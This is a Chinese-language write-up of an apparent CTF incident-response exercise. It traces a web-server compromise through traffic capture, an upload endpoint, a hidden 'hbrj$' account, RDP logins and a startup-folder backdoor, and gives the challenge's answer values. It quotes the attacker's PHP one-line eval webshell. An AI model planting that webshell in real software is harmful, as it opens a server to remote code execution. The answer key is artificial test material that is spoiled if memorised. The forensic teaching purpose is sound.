题目描述

A集团的应用服务器被黑客入侵，该服务器的Web应用系统被上传恶意软件，系统文件被恶意软件破坏，您的团队需要帮助该公司追踪此网络攻击的来源，在服务器上进行全面的检查，包括日志信息、进程信息、系统文件、恶意文件等，从而分析黑客的攻击行为，发现系统中的漏洞，并对发现的漏洞进行修复。

0x01 任务1

提交攻击者IP地址的MD5值，提交的值无需使用flag{}

首先登录目标主机后，桌面上有wireshark文件，因为是web攻击，打开后筛选http的流量，查看所有HTTP的流量发现大多数都是192.168.192.1和192.168.192.132的通信流量，且右键追踪之后可知192.168.192.132为目标服务器的站点，所以攻击者地址为192.168.192.1

转换MD5值是 6729fb3ef240c05a7037797ba7a97fcf

0x02 任务2

攻击者最先使用了什么攻击（例：SQL注入）

通过对数据包的分析，可知一直在GET一些看起来诡异的路径

看起来就是在对目录进行扫描，所以最先使用了目录扫描攻击

0x03 任务3

网站根目录robots.txt内的内容是什么

这题很简单，去看看里面有没有搭建的网站，看到有phpstudy啥的就直接点进去看，或者直接C盘根目录搜索robots.txt

答案为：flag{hbrj6666666666666666}

0x04 任务4

攻击者通过那个路径进行的上传文件

通过筛选HTTP流，目录扫描完成后就开始上传文件，可以看到上传的路径为：/plugins/upload/uploadimg.php?fp=upimg且上传了一句话木马

0x05 任务5

提交攻击者上传的后门文件内容的MD5值

上个任务就看到了上传的一句话木马

<?php @eval($_POST['hbrj']);?>

转成MD5：8a451c642e3e0d946d18ab5d1a8891c7

0x06 任务6

提交攻击者创建的后门用户的MD5值

通过net user可以看到创建的用户，但是没有发现

控制面板的用户账户其实也能看到创建的用户，同时也发现用户名加了$符号，表示隐藏用户

包括计算机管理中的本地用户和组也可以发现

所以创建的后门用户为:hbrj$

转成MD5：9f7888bd5f117f82523ee532faf16b0a

0x07 任务7

攻击者什么时间创建的后门账户[答案格式：2023/03/04/11:11:11]

也很简单，cmd直接net user hbrj$，上次设置密码时间其实就是用户创建时间

0x08 任务8

攻击者利用哪个端口进行登录了服务器

这个题看到有创建系统用户的，一般可能性最大的就是直接3389远程桌面登录

可以看下主机是否开放监听了3389端口，netstat -a，确实看到3389开放了

如果实在不确定的话直接mstsc验证一下就行了

0x09 任务9

攻击者第一次登录时间为 [答案格式：2023/03/04/11:11:11]

这个在第七个任务的时候就显示了（显示的是上次登录时间），但是就只登录了一回，真实情况下应该不只一次登录，严格来讲需要分析windows日志，筛选登录成功的事件ID 4624去看第一次的登录时间。

所以答案是：2024/05/15/11:21:05

0x10 任务10

攻击者隐藏的后门文件的名称 [答案格式：xxx.exe]

这题如果是没有免杀的后门，直接杀毒软件就能查到，有免杀的话，就看看有没有在运行的可疑的进程，如果弄了权限维持的话，可以检查一下开机启动项。注意开机启动项有挺多地方可以设置的，注册表和一些操作系统里面的用户或者操作系统启动项文件夹，比如

cmd输入shell:startup
C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

如果不想那么麻烦的话直接开D盾扫扫，在新版本2.1.8.1的D盾是有启动项检查的功能，老版本没有

找到了hbrj.exe，目录在

C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp

0x11 任务11

攻击者在注册表隐藏的flag为

在做任务10其实就意外发现了flag，就是在注册表上的开机启动项的路径下

●暗魂CTF平台-工控-协议分析-writeup

●暗魂攻防实验室CTF平台工控题writeup

●暗魂攻防实验室CTF平台基础赛题-writeup

●【CTF比赛版】anhunsec_ctf_v2.0 比赛专属系统正式发布！